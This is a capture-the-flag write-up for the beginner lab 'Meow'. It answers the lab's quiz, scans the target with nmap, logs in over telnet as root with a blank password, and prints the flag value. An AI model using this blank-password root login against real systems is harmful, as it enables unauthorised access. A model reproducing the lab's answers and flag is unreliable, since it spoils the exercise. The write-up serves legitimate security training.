Meow

Tags: #telnet #protocols #reconnaissance #weak_credentials #missconfigurations
Level: Starting Point
Date: 2025-05-23
VM IP: 10.129.178.31

Easy starting questions

1. What does the acronym VM stand for?
   Virtual Machine

2. What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It's also known as a console or shell.
   Terminal

3. What service do we use to form our VPN connection into HTB labs?
   OpenVPN

4. What tool do we use to test our connection to the target with an ICMP echo request?
   ping

5. What is the name of the most common tool for finding open ports on a target?
   nmap

6. What service do we identify on port 23/tcp during our scans?
   telnet

7. What username is able to log into the target over telnet with a blank password?
   root

Capture the Flag

Instruction: Submit root flag

Using nmap to scan all the services running with open ports

┌──(macc㉿kaliLab)-[~]
└─$ sudo nmap -sV 10.129.178.31
[sudo] password for macc:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-23 17:22 MDT
Nmap scan report for 10.129.178.31
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.28 seconds

Note the line:

PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd

• From here we know that the VM has the port 23 open and it is running telnet.

Look for how to format telnet access:

┌──(macc㉿kaliLab)-[~]
└─$ telnet --h
Usage: telnet [OPTION...] [HOST [PORT]]
Login to remote system HOST (optionally, on service port PORT)

Try login in as root

┌──(macc㉿kaliLab)-[~]
└─$ telnet -l root 10.129.178.31

• flag -l, --user=USER : attempt automatic login as USER

Output:

Trying 10.129.178.31...
Connected to 10.129.178.31.
Escape character is '^]'.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 23 May 2025 11:53:53 PM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             135
  Users logged in:       0
  IPv4 address for eth0: 10.129.178.31
  IPv6 address for eth0: dead:beef::250:56ff:feb0:c4f0

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~#

• We are in! and as root!

To see who you are (current user) run

root@Meow:~# whoami

List files in the current directory just for any chance that a flag file is in the root user directory:

root@Meow:~# ls
flag.txt  snap

• Note we have two files in the root user directory: flag.txt and snap

To quickly see the contents of the flag.txt files run

root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19

• There we have our flag!

flag: b40abdfe23665f766f9c61ecba8a4c19